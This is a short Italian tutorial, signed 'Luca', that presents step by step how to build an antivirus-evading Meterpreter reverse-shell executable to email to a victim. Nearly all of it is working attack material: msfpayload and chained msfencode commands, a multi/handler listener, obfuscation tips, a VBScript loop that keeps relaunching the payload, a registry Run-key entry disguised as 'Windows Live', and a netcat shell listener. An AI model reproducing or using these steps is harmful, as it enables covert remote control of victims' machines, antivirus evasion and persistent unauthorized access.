Questo articolo descrive la tecnica che gli hackers utilizzano per bypassare qualsiasi tipo di antivirus. Il risultato finale sarà un file (in questo caso) eseguibile che sarà spedito via mail al malcapitato. Step 1) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /root/test.exe Step 2) msfconsole Step 3) use multi/handler Step 4) set payload windows/meterpreter/reverse_tcp Step 5) set lport 443 Step 6) set lhost 192.168.0.15 Step 7) exploit Step 8) Use Xenocode Postbuild for .NET for obfuscate the code Step 9) Use Hex Edit to fill up the dangerous syscall Step 10) MANTAIN ACCESS mkdir to create remote directory Step 11) Inject 2 files into the directory -> test.exe ( a daemon process ) and a persist.vbs like this : state = 1 While state = 1 Set WshShell = WScript.CreateObject ("WScript.Shell") Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process") For Each objProcess in colProcessList if objProcess.name = "test.exe" then vFound = True End if Next If vFound = True then wscript.sleep 5000 Else WshShell.Run ("C:\<path were you deployed the files>\\test.exe") wscript.sleep 5000 End If vFound = False Wend Step 12) Enumerate a remote key registry reg enumkey -K HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Run (or in HKCU\Software\\Microsoft\\Windows\\Currentversion\\Run) Step 13)
Put the new one into the registry reg setval -k HKLM(HKCU)\\Software\\Microsoft\\Windows\\Currentversion\\Run -v Windows Live -d "C:\path\test.exe" If you want to use netcat : C:\\path\\nc.exe -L -d -p 443 e cmd.exe" Step 14) ENJOY :-) GAME OVER ! Luca |